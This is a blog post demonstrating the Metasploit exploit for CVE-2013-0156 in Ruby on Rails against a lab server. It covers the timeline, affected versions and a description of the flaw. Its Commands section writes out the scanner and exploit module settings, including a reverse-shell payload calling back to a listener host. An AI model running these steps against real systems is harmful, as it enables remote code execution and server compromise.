CVE-2013-0156 | Eric Romang Blog

Timeline :

Vulnerability discovered and reported to vendor by numerous people
Coordinated public release of the vulnerability the 2013-01-08
Metasploit PoC provided the 2013-01-09

PoC provided by :

charliesome
espes
lian
hdm

Reference(s) :

CVE-2013-0156
Exploiting Ruby on Rails with Metasploit (CVE-2013-0156)

Affected version(s) :

All versions of RoR (Ruby on Rails) previous versions 3.2.11, 3.1.10, 3.0.19 and 2.3.15

Tested on Centos 6.3 i386 with :

RoR 3.2.10
passenger 3.0.19
GrayLog2 0.9.6

Description :

This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated.

Commands :

use auxiliary/scanner/http/rails_xml_yaml_scanner
set RHOSTS 192.168.21.124
set VHOST rails.zataz.loc
run

use exploit/multi/http/rails_xml_yaml_code_exec
set RHOST 192.168.21.124
set VHOST rails.zataz.loc
set PAYLOAD ruby/shell_reverse_tcp
set LHOST 192.168.21.169
exploit

id
uname -a

Eric Romang Blog

aka wow on ZATAZ.com

Tag Archives: CVE-2013-0156

CVE-2013-0156 Ruby on Rails XML Processor YAML Vulnerability Metasploit Demo